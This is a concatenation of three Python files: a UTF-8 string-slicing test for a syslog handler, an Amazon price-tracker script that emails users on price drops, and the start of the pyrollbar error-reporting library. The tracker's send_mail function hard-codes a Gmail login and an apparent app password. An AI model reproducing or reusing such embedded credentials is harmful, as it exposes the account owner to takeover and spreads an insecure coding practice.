)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
13
) == (
b'This string ',
b'\xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
14
) == (
b'This string ',
b'\xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
15
) == (
b'This string ',
b'\xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
16
) == (
b'This string \xf0\x9f\xa4\xae',
b' has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
19
) == (
b'This string \xf0\x9f\xa4\xae ha',
b's \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
21
) == (
b'This string \xf0\x9f\xa4\xae has ',
b'\xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
22
) == (
b'This string \xf0\x9f\xa4\xae has ',
b'\xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
23
) == (
b'This string \xf0\x9f\xa4\xae has ',
b'\xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
24
) == (
b'This string \xf0\x9f\xa4\xae has ',
b'\xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
25
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c',
b' multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
31
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi',
b'-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
37
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte ',
b'\xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
38
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte ',
b'\xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
39
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte ',
b'\xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
40
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d',
b'\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
41
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d',
b'\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
42
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d',
b'\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
43
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d',
b'\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
44
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb',
b' characters!',
)
# There's not really anything we can do about making this detect modifiers and not split between the base
# character and modifying character. So all we really care about is that the resulting strings successfully
# decode without errors.
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d'.decode('utf-8')
b'\xf0\x9f\x8f\xbb characters!'.decode('utf-8')
|
tracker.py | from app.handlers.entry_handler import EntryHandler, AmazonCrawler
#from app.crawler.amazon_crawler import AmazonCrawler
import smtplib
import threading
import time
class Tracker():
def __init__(self):
self.entry_handler = EntryHandler()
def send_mail(self, URL, title, initial_price, new_price, user_email):
        server = smtplib.SMTP('smtp.gmail.com', 587)  # Establish a connection to the Gmail SMTP server
server.ehlo()
server.starttls() # Encrypting our connection
server.ehlo()
server.login('amazonpricet@gmail.com', 'arqdcapyimckuebi')
        subject = f'"{title}" price has dropped!'
        body = f'The price of "{title}" has fallen from ${initial_price} to ${new_price}!\nOpen the product link now: {URL}'
        msg = f"Subject: {subject}\n\n{body}"
server.sendmail(
            'amazonpricet@gmail.com',
user_email,
msg.encode('utf8')
)
server.quit()
print("Email has been sent!")
def run(self):
while True:
all_entries = self.entry_handler.get_all_entries()
for entry in all_entries:
product_url = entry.product_url
initial_price = entry.product_initial_price
crawler = AmazonCrawler(product_url)
current_price, _ = crawler.get_product_data()
if current_price < initial_price:
title = entry.product_title
user_email = entry.user_email
self.send_mail(product_url, title, initial_price, current_price, user_email)
self.entry_handler.delete_entry(entry)
            time.sleep(86400)  # re-check all entries once every 24 hours
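# Usage sketch (assumptions: called from the web app's startup code, and the
# Gmail credentials above would normally come from environment variables rather
# than being hard-coded):
#
#   from tracker import TrackerThread
#   TrackerThread()  # spawns a daemon thread that re-checks every entry daily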
class TrackerThread():
def __init__(self, interval=0):
self.interval = interval
self.tracker = Tracker()
thread = threading.Thread(target=self.tracker.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution |
__init__.py | """
Plugin for Pyramid apps to submit errors to Rollbar
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import copy
import functools
import inspect
import json
import logging
import os
import socket
import sys
import threading
import time
import traceback
import types
import uuid
import wsgiref.util
import requests
import six
from rollbar.lib import events, filters, dict_merge, parse_qs, text, transport, urljoin, iteritems, defaultJSONEncode
__version__ = '0.14.7'
__log_name__ = 'rollbar'
log = logging.getLogger(__log_name__)
try:
# 2.x
import Queue as queue
except ImportError:
# 3.x
import queue
# import request objects from various frameworks, if available
try:
from webob import BaseRequest as WebobBaseRequest
except ImportError:
WebobBaseRequest = None
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
DjangoHttpRequest = None
RestFrameworkRequest = None
else:
try:
from django.http import HttpRequest as DjangoHttpRequest
except (ImportError, ImproperlyConfigured):
DjangoHttpRequest = None
try:
from rest_framework.request import Request as RestFrameworkRequest
except (ImportError, ImproperlyConfigured):
RestFrameworkRequest = None
del ImproperlyConfigured
try:
from werkzeug.wrappers import BaseRequest as WerkzeugRequest
except (ImportError, SyntaxError):
WerkzeugRequest = None
try:
from werkzeug.local import LocalProxy as WerkzeugLocalProxy
except (ImportError, SyntaxError):
WerkzeugLocalProxy = None
try:
from tornado.httpserver import HTTPRequest as TornadoRequest
except ImportError:
TornadoRequest = None
try:
from bottle import BaseRequest as BottleRequest
except ImportError:
BottleRequest = None
try:
from sanic.request import Request as SanicRequest
except ImportError:
SanicRequest = None
try:
from google.appengine.api.urlfetch import fetch as AppEngineFetch
except ImportError:
AppEngineFetch = None
def passthrough_decorator(func):
def wrap(*args, **kwargs):
return func(*args, **kwargs)
return wrap
try:
from tornado.httpclient import AsyncHTTPClient as TornadoAsyncHTTPClient
except ImportError:
TornadoAsyncHTTPClient = None
try:
import treq
from twisted.python import log as twisted_log
def log_handler(event):
"""
Default uncaught error handler
"""
try:
if not event.get('isError') or 'failure' not in event:
return
err = event['failure']
# Don't report Rollbar internal errors to ourselves
if issubclass(err.type, ApiException):
log.error('Rollbar internal error: %s', err.value)
else:
report_exc_info((err.type, err.value, err.getTracebackObject()))
except:
log.exception('Error while reporting to Rollbar')
# Add Rollbar as a log handler which will report uncaught errors
twisted_log.addObserver(log_handler)
except ImportError:
treq = None
try:
from falcon import Request as FalconRequest
except ImportError:
FalconRequest = None
def get_request():
"""
    Get the current request object. The implementation varies depending on
    which framework's request helpers are importable; each helper below is
    tried in turn.
"""
# TODO(cory): add in a generic _get_locals_request() which
# will iterate up through the call stack and look for a variable
# that appears to be valid request object.
for fn in (_get_bottle_request,
_get_flask_request,
_get_pyramid_request,
_get_pylons_request):
try:
req = fn()
if req is not None:
return req
except:
pass
return None
def _get_bottle_request():
if BottleRequest is None:
return None
from bottle import request
return request
def _get_flask_request():
if WerkzeugRequest is None:
return None
from flask import request
return request
def _get_pyramid_request():
if WebobBaseRequest is None:
return None
from pyramid.threadlocal import get_current_request
return get_current_request()
def _get_pylons_request():
if WebobBaseRequest is None:
return None
from pylons import request
return request
BASE_DATA_HOOK = None
agent_log = None
VERSION = __version__
DEFAULT_ENDPOINT = 'https://api.rollbar.com/api/1/'
DEFAULT_TIMEOUT = 3
ANONYMIZE = 'anonymize'
DEFAULT_LOCALS_SIZES = {
'maxlevel': 5,
'maxdict': 10,
'maxlist': 10,
'maxtuple': 10,
'maxset': 10,
'maxfrozenset': 10,
'maxdeque': 10,
'maxarray': 10,
'maxstring': 100,
'maxlong': 40,
'maxother': 100,
}
# configuration settings
# configure by calling init() or overriding directly
SETTINGS = {
'access_token': None,
'enabled': True,
'environment': 'production',
'exception_level_filters': [],
'root': None, # root path to your code
'branch': None, # git branch name
'code_version': None,
'handler': 'thread', # 'blocking', 'thread', 'agent', 'tornado', 'gae' or 'twisted'
'endpoint': DEFAULT_ENDPOINT,
'timeout': DEFAULT_TIMEOUT,
'agent.log_file': 'log.rollbar',
'scrub_fields': [
'pw',
'passwd',
'password',
'secret',
'confirm_password',
'confirmPassword',
'password_confirmation',
'passwordConfirmation',
'access_token',
'accessToken',
'auth',
'authentication',
'authorization',
],
'url_fields': ['url', 'link', 'href'],
'notifier': {
'name': 'pyrollbar',
'version': VERSION
},
'allow_logging_basic_config': True, # set to False to avoid a call to logging.basicConfig()
'locals': {
'enabled': True,
'safe_repr': True,
'scrub_varargs': True,
'sizes': DEFAULT_LOCALS_SIZES,
'whitelisted_types': []
},
'verify_https': True,
'shortener_keys': [],
'suppress_reinit_warning': False,
'capture_email': False,
'capture_username': False,
'capture_ip': True,
'log_all_rate_limited_items': True,
'http_proxy': None,
'http_proxy_user': None,
'http_proxy_password': None,
'include_request_body': False,
}
_CURRENT_LAMBDA_CONTEXT = None
_LAST_RESPONSE_STATUS = None
# Set in init()
_transforms = []
_serialize_transform = None
_initialized = False
from rollbar.lib.transforms.scrub_redact import REDACT_REF
from rollbar.lib import transforms
from rollbar.lib.transforms.scrub import ScrubTransform
from rollbar.lib.transforms.scruburl import ScrubUrlTransform
from rollbar.lib.transforms.scrub_redact import ScrubRedactTransform
from rollbar.lib.transforms.serializable import SerializableTransform
from rollbar.lib.transforms.shortener import ShortenerTransform
## public api
def init(access_token, environment='production', scrub_fields=None, url_fields=None, **kw):
"""
Saves configuration variables in this module's SETTINGS.
access_token: project access token. Get this from the Rollbar UI:
- click "Settings" in the top nav
- click "Projects" in the left nav
- copy-paste the appropriate token.
environment: environment name. Can be any string; suggestions: 'production', 'development',
'staging', 'yourname'
**kw: provided keyword arguments will override keys in SETTINGS.
"""
global SETTINGS, agent_log, _initialized, _transforms, _serialize_transform, _threads
if scrub_fields is not None:
SETTINGS['scrub_fields'] = list(scrub_fields)
if url_fields is not None:
SETTINGS['url_fields'] = list(url_fields)
# Merge the extra config settings into SETTINGS
SETTINGS = dict_merge(SETTINGS, kw)
if _initialized:
# NOTE: Temp solution to not being able to re-init.
# New versions of pyrollbar will support re-initialization
# via the (not-yet-implemented) configure() method.
if not SETTINGS.get('suppress_reinit_warning'):
log.warning('Rollbar already initialized. Ignoring re-init.')
return
SETTINGS['access_token'] = access_token
SETTINGS['environment'] = environment
if SETTINGS.get('allow_logging_basic_config'):
logging.basicConfig()
if SETTINGS.get('handler') == 'agent':
agent_log = _create_agent_log()
# We will perform these transforms in order:
# 1. Serialize the payload to be all python built-in objects
# 2. Scrub the payloads based on the key suffixes in SETTINGS['scrub_fields']
# 3. Scrub URLs in the payload for keys that end with 'url'
    # 4. Optional - If local variable gathering is enabled, transform the
    #    trace frame values using the ShortenerTransform.
_serialize_transform = SerializableTransform(safe_repr=SETTINGS['locals']['safe_repr'],
whitelist_types=SETTINGS['locals']['whitelisted_types'])
_transforms = [
ScrubRedactTransform(),
_serialize_transform,
ScrubTransform(suffixes=[(field,) for field in SETTINGS['scrub_fields']], redact_char='*'),
ScrubUrlTransform(suffixes=[(field,) for field in SETTINGS['url_fields']], params_to_scrub=SETTINGS['scrub_fields'])
]
# A list of key prefixes to apply our shortener transform to. The request
# being included in the body key is old behavior and is being retained for
# backwards compatibility.
shortener_keys = [
('request', 'POST'),
('request', 'json'),
('body', 'request', 'POST'),
('body', 'request', 'json'),
]
if SETTINGS['locals']['enabled']:
shortener_keys.append(('body', 'trace', 'frames', '*', 'code'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'args', '*'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'kwargs', '*'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'locals', '*'))
shortener_keys.extend(SETTINGS['shortener_keys'])
shortener = ShortenerTransform(safe_repr=SETTINGS['locals']['safe_repr'],
keys=shortener_keys,
**SETTINGS['locals']['sizes'])
_transforms.append(shortener)
_threads = queue.Queue()
events.reset()
filters.add_builtin_filters(SETTINGS)
_initialized = True
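# Usage sketch (the access token below is a placeholder): init() must be called
# once before any report_* function; extra keyword arguments are merged into
# SETTINGS, so e.g. the handler and code version can be configured here.
#
#   rollbar.init('YOUR_PROJECT_ACCESS_TOKEN',
#                environment='staging',
#                handler='blocking',        # send synchronously instead of via a thread
#                code_version='abc123')     # tag payloads with a release identifier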
def lambda_function(f):
"""
Decorator for making error handling on AWS Lambda easier
"""
@functools.wraps(f)
def wrapper(event, context):
global _CURRENT_LAMBDA_CONTEXT
_CURRENT_LAMBDA_CONTEXT = context
try:
result = f(event, context)
return wait(lambda: result)
except:
cls, exc, trace = sys.exc_info()
report_exc_info((cls, exc, trace.tb_next))
wait()
raise
return wrapper
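# Usage sketch (assumption: a standard AWS Lambda entry point, with
# rollbar.init() already called at module import time):
#
#   @rollbar.lambda_function
#   def handler(event, context):
#       return do_work(event)  # do_work is hypothetical; uncaught exceptions are reported, then re-raised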
def report_exc_info(exc_info=None, request=None, extra_data=None, payload_data=None, level=None, **kw):
"""
Reports an exception to Rollbar, using exc_info (from calling sys.exc_info())
exc_info: optional, should be the result of calling sys.exc_info(). If omitted, sys.exc_info() will be called here.
request: optional, a WebOb, Werkzeug-based or Sanic request object.
extra_data: optional, will be included in the 'custom' section of the payload
payload_data: optional, dict that will override values in the final payload
(e.g. 'level' or 'fingerprint')
kw: provided for legacy purposes; unused.
Example usage:
rollbar.init(access_token='YOUR_PROJECT_ACCESS_TOKEN')
try:
do_something()
except:
rollbar.report_exc_info(sys.exc_info(), request, {'foo': 'bar'}, {'level': 'warning'})
"""
if exc_info is None:
exc_info = sys.exc_info()
try:
return _report_exc_info(exc_info, request, extra_data, payload_data, level=level)
except Exception as e:
log.exception("Exception while reporting exc_info to Rollbar. %r", e)
def report_message(message, level='error', request=None, extra_data=None, payload_data=None):
"""
Reports an arbitrary string message to Rollbar.
message: the string body of the message
level: level to report at. One of: 'critical', 'error', 'warning', 'info', 'debug'
request: the request object for the context of the message
extra_data: dictionary of params to include with the message. 'body' is reserved.
payload_data: param names to pass in the 'data' level of the payload; overrides defaults.
"""
try:
return _report_message(message, level, request, extra_data, payload_data)
except Exception as e:
log.exception("Exception while reporting message to Rollbar. %r", e)
def send_payload(payload, access_token):
"""
    Sends a payload object (the result of calling _build_payload()); the payload is serialized here.
Uses the configured handler from SETTINGS['handler']
Available handlers:
- 'blocking': calls _send_payload() (which makes an HTTP request) immediately, blocks on it
- 'thread': starts a single-use thread that will call _send_payload(). returns immediately.
- 'agent': writes to a log file to be processed by rollbar-agent
- 'tornado': calls _send_payload_tornado() (which makes an async HTTP request using tornado's AsyncHTTPClient)
- 'gae': calls _send_payload_appengine() (which makes a blocking call to Google App Engine)
    - 'twisted': calls _send_payload_twisted() (which makes an async HTTP request using Twisted and Treq)
"""
payload = events.on_payload(payload)
if payload is False:
return
payload_str = _serialize_payload(payload)
handler = SETTINGS.get('handler')
if handler == 'blocking':
_send_payload(payload_str, access_token)
elif handler == 'agent':
agent_log.error(payload_str)
elif handler == 'tornado':
if TornadoAsyncHTTPClient is None:
log.error('Unable to find tornado')
return
_send_payload_tornado(payload_str, access_token)
elif handler == 'gae':
if AppEngineFetch is None:
log.error('Unable to find AppEngine URLFetch module')
return
_send_payload_appengine(payload_str, access_token)
elif handler == 'twisted':
if treq is None:
log.error('Unable to find Treq')
return
_send_payload_twisted(payload_str, access_token)
else:
# default to 'thread'
thread = threading.Thread(target=_send_payload, args=(payload_str, access_token))
_threads.put(thread)
thread.start()
def search_items(title, return_fields=None, access_token=None, endpoint=None, **search_fields):
"""
Searches a project for items that match the input criteria.
title: all or part of the item's title to search for.
return_fields: the fields that should be returned for each item.
e.g. ['id', 'project_id', 'status'] will return a dict containing
only those fields for each item.
access_token: a project access token. If this is not provided,
the one provided to init() will be used instead.
search_fields: additional fields to include in the search.
currently supported: status, level, environment
"""
if not title:
return []
if return_fields is not None:
return_fields = ','.join(return_fields)
return _get_api('search/',
title=title,
fields=return_fields,
access_token=access_token,
endpoint=endpoint,
**search_fields)
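# Usage sketch (assumption: the configured access token can read project items;
# per the docstring, status/level/environment are the supported search fields):
#
#   items = search_items('Timeout', return_fields=['id', 'status'],
#                        status='active', level='error')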
def wait(f=None):
_threads.join()
if f is not None:
return f()
class ApiException(Exception):
"""
This exception will be raised if there was a problem decoding the
response from an API call.
"""
pass
class ApiError(ApiException):
"""
This exception will be raised if the API response contains an 'err'
field, denoting there was a problem fulfilling the api request.
"""
pass
class Result(object):
"""
This class encapsulates the response from an API call.
Usage:
result = search_items(title='foo', fields=['id'])
print result.data
"""
def __init__(self, access_token, path, params, data):
self.access_token = access_token
self.path = path
self.params = params
self.data = data
def __str__(self):
return str(self.data)
class PagedResult(Result):
"""
This class wraps the response from an API call that responded with
a page of results.
Usage:
result = search_items(title='foo', fields=['id'])
print 'First page: %d, data: %s' % (result.page, result.data)
result = result.next_page()
print 'Second page: %d, data: %s' % (result.page, result.data)
"""
def __init__(self, access_token, path, page_num, params, data, endpoint=None):
super(PagedResult, self).__init__(access_token, path, params, data)
self.page = page_num
self.endpoint = endpoint
def next_page(self):
params = copy.copy(self.params)
params['page'] = self.page + 1
return _get_api(self.path, endpoint=self.endpoint, **params)
def prev_page(self):
if self.page <= 1:
return self
params = copy.copy(self.params)
params['page'] = self.page - 1
return _get_api(self.path, endpoint=self.endpoint, **params)
## internal functions
def _resolve_exception_class(idx, filter):
cls, level = filter
if isinstance(cls, six.string_types):
# Lazily resolve class name
parts = cls.split('.')
module = '.'.join(parts[:-1])
if module in sys.modules and hasattr(sys.modules[module], parts[-1]):
cls = getattr(sys.modules[module], parts[-1])
SETTINGS['exception_level_filters'][idx] = (cls, level)
else:
cls = None
return cls, level
def _filtered_level(exception):
for i, filter in enumerate(SETTINGS['exception_level_filters']):
cls, level = _resolve_exception_class(i, filter)
if cls and isinstance(exception, cls):
return level
return None
def _is_ignored(exception):
return _filtered_level(exception) == 'ignored'
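# Example of the filter mechanism above ('token' is a placeholder):
# exception_level_filters maps exception classes (or lazily-resolved dotted
# class names) to report levels, and the special level 'ignored' suppresses
# the report entirely.
#
#   rollbar.init(token, exception_level_filters=[
#       (IOError, 'warning'),
#       ('requests.exceptions.ConnectionError', 'ignored'),
#   ])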
def _create_agent_log():
"""
Creates .rollbar log file for use with rollbar-agent
"""
log_file = SETTINGS['agent.log_file']
if not log_file.endswith('.rollbar'):
log.error("Provided agent log file does not end with .rollbar, which it must. "
"Using default instead.")
        log_file = 'log.rollbar'  # fall back to the default value (DEFAULTS is not defined in this module)
retval = logging.getLogger('rollbar_agent')
handler = logging.FileHandler(log_file, 'a', 'utf-8')
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
retval.addHandler(handler)
retval.setLevel(logging.WARNING)
return retval
def _report_exc_info(exc_info, request, extra_data, payload_data, level=None):
"""
Called by report_exc_info() wrapper
"""
if not _check_config():
return
filtered_level = _filtered_level(exc_info[1])
if level is None:
level = filtered_level
filtered_exc_info = events.on_exception_info(exc_info,
request=request,
extra_data=extra_data,
payload_data=payload_data,
level=level)
if filtered_exc_info is False:
return
cls, exc, trace = filtered_exc_info
data = _build_base_data(request)
if level is not None:
data['level'] = level
# walk the trace chain to collect cause and context exceptions
trace_chain = _walk_trace_chain(cls, exc, trace)
extra_trace_data = None
if len(trace_chain) > 1:
data['body'] = {
'trace_chain': trace_chain
}
if payload_data and ('body' in payload_data) and ('trace' in payload_data['body']):
extra_trace_data = payload_data['body']['trace']
del payload_data['body']['trace']
else:
data['body'] = {
'trace': trace_chain[0]
}
    if extra_data:
if not isinstance(extra_data, dict):
extra_data = {'value': extra_data}
if extra_trace_data:
extra_data = dict_merge(extra_data, extra_trace_data)
data['custom'] = extra_data
if extra_trace_data and not extra_data:
data['custom'] = extra_trace_data
request = _get_actual_request(request)
_add_request_data(data, request)
_add_person_data(data, request)
_add_lambda_context_data(data)
data['server'] = _build_server_data()
if payload_data:
data = dict_merge(data, payload_data)
payload = _build_payload(data)
send_payload(payload, payload.get('access_token'))
return data['uuid']
def _walk_trace_chain(cls, exc, trace):
trace_chain = [_trace_data(cls, exc, trace)]
while True:
exc = getattr(exc, '__cause__', None) or getattr(exc, '__context__', None)
if not exc:
break
trace_chain.append(_trace_data(type(exc), exc, getattr(exc, '__traceback__', None)))
return trace_chain
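# Sketch of what _walk_trace_chain() collects (Python 3 only; Python 2
# exceptions carry neither __cause__ nor __context__):
#
#   try:
#       try:
#           1 / 0
#       except ZeroDivisionError as e:
#           raise ValueError('bad input') from e
#   except ValueError:
#       rollbar.report_exc_info()  # body uses 'trace_chain' (two traces), not 'trace'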
def _trace_data(cls, exc, trace):
# exception info
# most recent call last
raw_frames = traceback.extract_tb(trace)
frames = [{'filename': f[0], 'lineno': f[1], 'method': f[2], 'code': f[3]} for f in raw_frames]
trace_data = {
'frames': frames,
'exception': {
'class': getattr(cls, '__name__', cls.__class__.__name__),
'message': text(exc),
}
}
_add_locals_data(trace_data, (cls, exc, trace))
return trace_data
def _report_message(message, level, request, extra_data, payload_data):
"""
Called by report_message() wrapper
"""
if not _check_config():
return
filtered_message = events.on_message(message,
request=request,
extra_data=extra_data,
payload_data=payload_data,
level=level)
if filtered_message is False:
return
data = _build_base_data(request, level=level)
# message
data['body'] = {
'message': {
'body': filtered_message
}
}
    if extra_data:
data['body']['message'].update(extra_data)
request = _get_actual_request(request)
_add_request_data(data, request)
_add_person_data(data, request)
_add_lambda_context_data(data)
data['server'] = _build_server_data()
if payload_data:
data = dict_merge(data, payload_data)
payload = _build_payload(data)
send_payload(payload, payload.get('access_token'))
return data['uuid']
def _check_config():
if not SETTINGS.get('enabled'):
log.info("pyrollbar: Not reporting because rollbar is disabled.")
return False
# skip access token check for the agent handler
if SETTINGS.get('handler') == 'agent':
return True
# make sure we have an access_token
if not SETTINGS.get('access_token'):
log.warning("pyrollbar: No access_token provided. Please configure by calling rollbar.init() with your access token.")
return False
return True
def _build_base_data(request, level='error'):
data = {
'timestamp': int(time.time()),
'environment': SETTINGS['environment'],
'level': level,
'language': 'python %s' % '.'.join(str(x) for x in sys.version_info[:3]),
'notifier': SETTINGS['notifier'],
'uuid': text(uuid.uuid4()),
}
if SETTINGS.get('code_version'):
data['code_version'] = SETTINGS['code_version']
if BASE_DATA_HOOK:
BASE_DATA_HOOK(request, data)
return data
def _add_person_data(data, request):
try:
person_data = _build_person_data(request)
except Exception as e:
log.exception("Exception while building person data for Rollbar payload: %r", e)
else:
if person_data:
if not SETTINGS['capture_username'] and 'username' in person_data:
person_data['username'] = None
if not SETTINGS['capture_email'] and 'email' in person_data:
person_data['email'] = None
data['person'] = person_data
def _build_person_data(request):
"""
    Returns a dictionary describing the logged-in user using data from `request`.
    Tries `request.rollbar_person` first, then `user`, then `user_id`.
"""
if hasattr(request, 'rollbar_person'):
rollbar_person_prop = request.rollbar_person
try:
person = rollbar_person_prop()
except TypeError:
person = rollbar_person_prop
if person and isinstance(person, dict):
return person
else:
return None
if hasattr(request, 'user'):
user_prop = request.user
try:
user = user_prop()
except TypeError:
user = user_prop
if not user:
return None
elif isinstance(user, dict):
return user
else:
retval = {}
if getattr(user, 'id', None):
retval['id'] = text(user.id)
elif getattr(user, 'user_id', None):
retval['id'] = text(user.user_id)
# id is required, so only include username/email if we have an id
if retval.get('id'):
username = getattr(user, 'username', None)
email = getattr(user, 'email', None)
retval.update({
'username': username,
'email': email
})
return retval
if hasattr(request, 'user_id'):
user_id_prop = request.user_id
try:
user_id = user_id_prop()
except TypeError:
user_id = user_id_prop
if not user_id:
return None
return {'id': text(user_id)}
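# Example: a framework integration can expose the current user by setting
#
#   request.rollbar_person = {'id': '42', 'username': 'alice'}
#
# (or a callable returning that dict). 'id' is required; username and email are
# nulled out later unless capture_username/capture_email are enabled in SETTINGS.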
def _get_func_from_frame(frame):
func_name = inspect.getframeinfo(frame).function
caller = frame.f_back
if caller:
func = caller.f_locals.get(func_name,
caller.f_globals.get(func_name))
else:
func = None
return func
def _flatten_nested_lists(l):
ret = []
for x in l:
if isinstance(x, list):
ret.extend(_flatten_nested_lists(x))
else:
ret.append(x)
return ret
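# Example: _flatten_nested_lists(['x', ['a', 'b'], 'z']) == ['x', 'a', 'b', 'z'].
# This handles the Python 2 anonymous-tuple-argument case described in
# _add_locals_data() below, where arginfo.args can contain nested lists.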
def _add_locals_data(trace_data, exc_info):
if not SETTINGS['locals']['enabled']:
return
frames = trace_data['frames']
cur_tb = exc_info[2]
frame_num = 0
num_frames = len(frames)
while cur_tb:
cur_frame = frames[frame_num]
tb_frame = cur_tb.tb_frame
cur_tb = cur_tb.tb_next
if not isinstance(tb_frame, types.FrameType):
# this can happen if the traceback or frame is wrapped in some way,
# for example by `ExceptionInfo` in
# https://github.com/celery/billiard/blob/master/billiard/einfo.py
log.warning('Traceback frame not a types.FrameType. Ignoring.')
frame_num += 1
continue
# Create placeholders for argspec/varargspec/keywordspec/locals
argspec = None
varargspec = None
keywordspec = None
_locals = {}
try:
arginfo = inspect.getargvalues(tb_frame)
# Optionally fill in locals for this frame
if arginfo.locals and _check_add_locals(cur_frame, frame_num, num_frames):
